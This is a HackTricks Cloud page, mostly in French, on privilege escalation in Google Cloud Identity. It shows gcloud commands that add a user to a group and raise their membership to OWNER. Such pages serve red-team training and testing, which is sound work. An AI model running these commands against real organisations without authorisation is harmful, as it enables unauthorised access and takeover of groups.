GCP - Cloudidentity Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Cloudidentity

Pour plus d'informations sur le service cloudidentity, consultez cette page :

GCP - IAM, Principals & Org Policies Enum

Ajoutez-vous à un groupe

Si votre utilisateur a suffisamment de permissions ou si le groupe est mal configuré, il pourrait être en mesure de se faire membre d'un nouveau groupe :

gcloud identity groups memberships add --group-email <email> --member-email <email> [--roles OWNER]
# If --roles isn't specified you will get MEMBER

Modifier l'appartenance au groupe

Si votre utilisateur a suffisamment de permissions ou si le groupe est mal configuré, il pourrait être en mesure de se faire PROPRIÉTAIRE d'un groupe dont il est membre :

# Check the current membership level
gcloud identity groups memberships describe --member-email <email> --group-email <email>

# If not OWNER try
gcloud identity groups memberships modify-membership-roles --group-email <email> --member-email <email> --add-roles=OWNER

Soutenir HackTricks

Consultez les plans d'abonnement !
Rejoignez le 💬 groupe Discord ou le groupe telegram ou suivez-nous sur Twitter 🐦 @hacktricks_live.
Partagez des astuces de hacking en soumettant des PR aux HackTricks et HackTricks Cloud dépôts github.

PreviousGCP - Cloudfunctions Privesc NextGCP - Cloud Scheduler Privesc

Last updated 3 days ago